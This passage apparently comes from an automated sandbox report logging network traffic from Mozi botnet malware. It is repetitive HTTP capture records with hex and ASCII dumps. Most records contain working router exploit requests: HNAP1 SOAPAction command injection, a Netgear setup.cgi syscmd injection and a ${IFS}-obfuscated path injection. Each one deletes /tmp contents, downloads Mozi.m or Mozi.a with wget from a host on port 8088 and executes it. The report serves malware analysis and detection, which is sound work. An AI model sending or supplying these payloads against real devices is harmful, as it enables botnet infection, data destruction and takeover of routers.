6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 3.20.201.243:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.208.34.61:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.72.158.238:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 